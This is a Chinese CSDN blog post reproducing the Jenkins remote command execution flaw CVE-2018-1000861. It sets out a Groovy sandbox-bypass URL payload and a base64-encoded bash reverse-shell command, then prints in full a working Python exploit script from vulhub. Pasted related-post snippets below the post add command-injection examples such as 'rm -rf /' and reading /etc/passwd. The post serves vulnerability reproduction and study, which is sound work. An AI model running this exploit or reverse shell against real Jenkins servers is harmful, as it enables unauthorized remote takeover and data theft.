【渗透测试】Jenkins远程命令执行漏洞(CVE-2018-1000861)

于 2024-07-27 13:25:11 发布
阅读量768 收藏 8
点赞数 5
分类专栏: 漏洞复现 文章标签: jenkins 网络安全 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48201589/article/details/140734120
版权

漏洞简介

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

影响版本

Jenkins主版本 <= 2.153
Jenkins LTS版本 <= 2.138.3

漏洞复现

查看jenkins版本

curl -s -I http://192.168.178.128:8080| grep X-Jenkins

在这里插入图片描述
命令执行创建文件夹

https://127.0.0.1:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public
class x {public x(){“touch /tmp/success”.execute()}}

在这里插入图片描述
nc反弹shell

python2 poc.py http://127.0.0.1:8080 “bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}”

POC源自vulhub:

#!/usr/bin/python
# coding: UTF-8
# author: Orange Tsai(@orange_8361)
# 

import sys
import requests
from enum import Enum

# remove bad SSL warnings
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass


endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'

class mode(Enum):
    ACL_PATCHED = 0
    NOT_JENKINS = 1
    READ_ENABLE = 2
    READ_BYPASS = 3
    ENTRY_NOTFOUND = 999

def usage():
    print '''
  Usage:
    python exp.py <url> <cmd>
    '''

def _log(msg, fail=False):
    nb = '[*]'
    if fail:
        nb = '[-]'
    print '%s %s' % (nb, msg)

def _get(url, params=None):
    r = requests.get(url, verify=False, params=params)
    return r.status_code, r.content

def _add_bypass(url):
    return url + 'securityRealm/user/admin/'

def check(url):
    flag, accessible = mode.ACL_PATCHED, False

    # check ANONYMOUS_READ
    status, content = _get(url)
    if status == 200 and 'adjuncts' in content:
        flag, accessible = mode.READ_ENABLE, True
        _log('ANONYMOUS_READ enable!')
    elif status == 403:
        _log('ANONYMOUS_READ disable!')

        # check ACL bypass, CVE-2018-1000861
        status, content = _get(_add_bypass(url))
        if status == 200 and 'adjuncts' in content:
            flag, accessible = mode.READ_BYPASS, True
    else:
        flag = mode.NOT_JENKINS

    # check entry point, CVE-2019-1003005
    if accessible:
        if flag is mode.READ_BYPASS:
            url = _add_bypass(url)
        status, content = _get(url + endpoint)

        if status == 404:
            flag = mode.ENTRY_NOTFOUND

    return flag

def exploit(url, cmd):
    payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % cmd.encode('hex')
    params = {
        'sandbox': True, 
        'value': payload
    }

    status, content = _get(url + endpoint, params)
    if status == 200:
        _log('Exploit success!(it should be :P)')
    elif status == 405:
        _log('It seems Jenkins has patched the RCE gadget :(')
    else:
        _log('Exploit fail with HTTP status [%d]' % status, fail=True)
        if 'stack trace' in content:
            for _ in content.splitlines():
                if _.startswith('Caused:'):
                    _log(_, fail=True)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
        exit()

    url = sys.argv[1].rstrip('/') + '/'
    cmd = sys.argv[2]

    flag = check(url)
    if flag is mode.ACL_PATCHED:
        _log('It seems Jenkins is up-to-date(>2.137) :(', fail=True)
    elif flag is mode.NOT_JENKINS:
        _log('Is this Jenkins?', fail=True)
    elif flag is mode.READ_ENABLE:
        exploit(url, cmd)
    elif flag is mode.READ_BYPASS:
        _log('Bypass with CVE-2018-1000861!')
        exploit(_add_bypass(url), cmd)
    else:
        _log('The `checkScript` is not found, please try other entries(see refs)', fail=True)

修复建议:

Jenkins更新至安全版本。

命令执行漏洞详解
TechEnthusiast的博客
08-06 493
命令执行漏洞(Command Execution Vulnerability)是指应用程序在处理用户输入时,未对输入进行充分的过滤和验证,导致攻击者能够注入并执行系统命令的一种安全漏洞。这种漏洞可能导致攻击者获取服务器控制权,造成严重的安全威胁。命令执行漏洞是一种严重的安全威胁,可能导致整个系统被攻击者控制。开发人员应该充分了解其原理和防护措施,在开发过程中严格执行安全编码规范,避免使用危险函数,对用户输入进行严格验证和过滤。同时,应定期进行安全测试和代码审计,及时修复发现的漏洞
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 4185
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
Jenkins远程命令执行漏洞CVE-2018-1000861
qq_62056583的博客
07-10 758
通过更新中心中的1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。它可以独立运行多种进程、多个应用,更加充分地发挥基础设施的作用,同时保持各个独立系统的安全性。使用docker exec -it ID bin/bash进入目录中进行查看,可以看到成功注入,漏洞复现成功。使用docker技术搭建漏洞环境,在实验环境中复现该漏洞。IP地址:192.168.32.135。
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 568
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 701
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4602
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 3099
网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 863
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
漏洞复现】Jenkins文件读取漏洞CVE-2024-23897)
2301_80127209的博客
06-18 6777
jenkins是啥?简单理解就是:一个开源的、用于方便代码管理、部署的基于web的平台,用于提高团队开发效率(生产力)。Jenkins CLI 任意文件读取漏洞 CVE-2024-23897 是怎么回事?
2024HVV在即| 最新漏洞CVE(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3099
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
[漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)
qq_45751902的博客
11-24 2788
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353)
m0_63082628的博客
07-05 1855
Jenkins-CI 远程代码执行漏洞复现
jenkins漏洞复现
Shanfenglan's blog
11-30 1651
文章目录什么是jenkinsJenkins远程命令执行漏洞CVE-2018-1000861)参考文章 什么是jenkins 实现了CI/CD的产品。jenkins会从git或者svn上拉代码然后在配置所指向的环境中进行编译并上线。 Jenkins的思想就是自动化部署,“自动化”的具体体现在:当我们向版本库(SVN)提交新的代码后,应用服务器(Tomcat)就会自动从我们的SVN上拉去新的war包,然后重新部署,用户或测试人员看到的就是最新的应用程序。 Jenkins远程命令执行漏洞CVE-2018-10
漏洞复现-Jenkins
aming小老弟
10-03 622
渗透
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)
m0_65354386的博客
07-05 873
Jenkins 可以自动执行代码构建、编译、打包以及单元测试、集成测试等,确保代码质量,还拥有丰富的插件库,能够集成各种工具和服务,且支持自动化部署应用到测试或生产环境。Jenkins 提供详细的构建日志和报告,通过自动化构建和测试,能够为开发团队提供了高效的持续集成和持续部署解决方案,同时促进敏捷开发和 DevOps 实践的落地。将刚才生成的字节码文件发送给目标:python exploit.py http://your-ip:8080 jenkins_poc.ser。查看靶场端口:docker ps。
Jenkins漏洞CVE-2017-1000353)复现
qq_62056583的博客
07-05 1001
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1610
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
从零开始介绍命令执行漏洞
最新发布
03-28
<think>嗯,用户让我从零开始介绍命令执行漏洞。我需要先理清楚这个主题的基本概念,然后逐步展开,确保用户能够理解。首先,得定义什么是命令执行漏洞,可能还需要分清楚不同种类的命令执行漏洞,比如OS命令注入和远程代码执行(RCE)的区别。有时候用户可能不太清楚这两者的区别,所以需要明确说明。 接下来,应该解释漏洞产生的原因。这里需要提到应用程序如何处理用户输入,如果未正确过滤或转义,攻击者就能注入恶意命令。可能需要举一些例子,比如在Web应用中,用户输入的表单字段被直接拼接到系统命令中执行,导致漏洞。 然后,需要给出具体的示例,帮助用户更直观地理解。比如,PHP中的system函数调用,用户输入的部分直接传入,导致可以执行任意命令。同时,Python的例子可能也会有类似的情况,使用os.system时处理不当的问题。 还要说明漏洞的危害,这部分很重要,用户需要知道为什么这个漏洞危险。比如执行任意命令可能导致服务器被控制,数据泄露,内网渗透等等。同时,攻击者可能利用此漏洞进行进一步的攻击,比如安装后门,横向移动等。 防御措施部分,应该分点列出,每个措施简要说明。比如输入验证、使用安全函数、最小权限原则、白名单过滤、转义处理等。需要具体到不同编程语言中的安全函数,比如Python的subprocess模块,PHP的escapeshellarg等,这样用户知道如何在实际中应用。 可能还需要提到一些漏洞的变种或者高级利用方式,比如利用管道符、重定向符号,或者在Windows和Linux下的不同命令分隔符。这些细节能帮助用户更全面地了解攻击者的手段,从而更好地防御。 在思考过程中,还要注意用户可能的疑问点。比如,用户可能分不清命令执行和代码执行的区别,这时候需要明确区分。另外,用户可能想知道如何检测这类漏洞,可以建议代码审计、动态测试、使用工具如Burp Suite进行渗透测试等。 需要确保回答结构清晰,按照漏洞概述、原因、示例、危害、防御措施的结构来组织。每个部分用简短的段落,避免信息过载。同时,使用中文,保持口语化,但专业术语要准确。还要检查LaTeX格式是否正确,行内公式用$...$,独立公式用$$...$$,虽然在这个问题中可能用不到太多数学公式,但如果有相关部分需要注意。 最后,要检查是否有遗漏的重要点,比如实际案例(比如著名的漏洞事件),或者最新的趋势(比如在云环境中的命令执行漏洞)。不过作为基础介绍,可能不需要太深入,保持简洁明了即可。</think>好的,我将按照以下结构逐步介绍命令执行漏洞: #### 一、漏洞概述 命令执行漏洞(Command Injection)指攻击者通过构造恶意输入,使应用程序执行非预期的操作系统命令。常见于以下场景: - Web应用中调用系统命令处理用户输入 - 程序拼接未过滤的用户输入到命令行 - 服务端脚本直接执行系统命令(如PHP的`system()`、Python的`os.system()`) #### 二、漏洞产生原因 1. **未过滤的危险函数** 例如直接拼接用户输入到命令: ```php // PHP危险示例 $user_input = $_GET['ip']; system("ping -c 4 " . $user_input); ``` 若用户输入`8.8.8.8; rm -rf /`,将触发删除操作 2. **不安全的参数处理** 未对特殊字符(`|` `&` `;` `\n`等)进行转义 #### 三、漏洞示例 1. **基础注入** 输入`127.0.0.1 && ls /`,实际执行: ```bash ping 127.0.0.1 && ls / ``` 输出本机IP的ping结果**和**根目录文件列表 2. **多平台差异** - Linux:使用`;` `&&` `||`分隔命令 - Windows:使用`&` `|` `&&` `||` #### 四、漏洞危害 1. **服务器完全失控** - 执行`/bin/sh`获取shell - 下载并运行恶意程序 - 修改系统配置 2. **数据泄露** ```bash cat /etc/passwd # 读取用户信息 ps aux # 查看进程信息 ``` 3. **内网渗透** ```bash nmap 192.168.1.0/24 # 扫描内网 ssh横向移动 ``` #### 五、防御措施 1. **输入验证** - 白名单过滤(如IP地址仅允许数字和`.`) - 正则表达式检查:`/^[0-9\.]+$/` 2. **使用安全函数** - Python: ```python subprocess.run(['ping', '-c', '4', user_input], shell=False) ``` - PHP: ```php escapeshellarg($user_input); ``` 3. **最小权限原则** 运行服务的用户应限制权限: ```bash # 创建低权限用户 useradd -s /sbin/nologin appuser ``` 4. **禁用危险函数** 在php.ini中设置: ```ini disable_functions = system, exec, shell_exec ``` #### 六、检测方法 1. **代码审计** 搜索以下关键词: ```php system(), exec(), passthru(), popen() ``` ```python os.system(), subprocess.run(shell=True) ``` 2. **渗透测试** 使用Burp Suite等工具尝试注入: ``` ;sleep 10 # 观察响应延迟 | id # 查看命令回显 ``` #### 七、真实案例 - **CVE-2021-41773**:Apache HTTP Server路径穿越漏洞 - **Jenkins CLI RCE**:通过反序列化执行任意命令 需要更深入了解某个环节(如防御方法的具体实现、高级绕过技巧等),可以告诉我具体方向。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello_Brian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值